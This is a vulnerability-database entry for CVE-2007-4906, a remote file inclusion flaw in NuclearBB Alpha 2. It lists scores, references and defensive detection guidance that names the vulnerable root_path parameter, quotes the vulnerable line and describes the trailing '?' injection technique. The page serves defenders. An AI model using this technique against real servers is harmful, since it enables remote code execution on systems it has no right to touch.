CVE-2007-4906
published 2007-09-17CVE-2007-4906: PHP remote file inclusion vulnerability in tasks/send_queued_emails.php in NuclearBB Alpha 2, when register_globals is enabled, allows remote attackers to…
PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
38.38%
98.4th percentile
PHP remote file inclusion vulnerability in tasks/send_queued_emails.php in NuclearBB Alpha 2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nuclearbb | nuclearbb | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP GET requests to send_queued_emails.php containing a URL (http:// or https://) in the root_path parameter, which indicates an RFI exploitation attempt. ↗
- →The trailing '?' appended to the injected URL (e.g., shell.txt?) is a classic RFI technique to nullify the appended local path string; detect this pattern in query strings targeting root_path. ↗
- →The vulnerable code path is line 14 of send_queued_emails.php: require("$root_path/inc/functions_email.php"); — any unsanitised URL value in root_path will be remotely included. ↗
- →Exploitation requires register_globals to be enabled on the target server; correlate findings with server configuration checks for register_globals=On. ↗
- ·This vulnerability is only exploitable when PHP's register_globals directive is enabled (On). Servers with register_globals=Off are not affected. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/38978http://securityreason.com/securityalert/3142http://www.securityfocus.com/archive/1/479086/100/0/threadedhttps://exchange.xforce.ibmcloud.com/vulnerabilities/36556https://www.exploit-db.com/exploits/4395http://osvdb.org/38978http://securityreason.com/securityalert/3142http://www.securityfocus.com/archive/1/479086/100/0/threadedhttps://exchange.xforce.ibmcloud.com/vulnerabilities/36556https://www.exploit-db.com/exploits/4395
2007-09-17
Published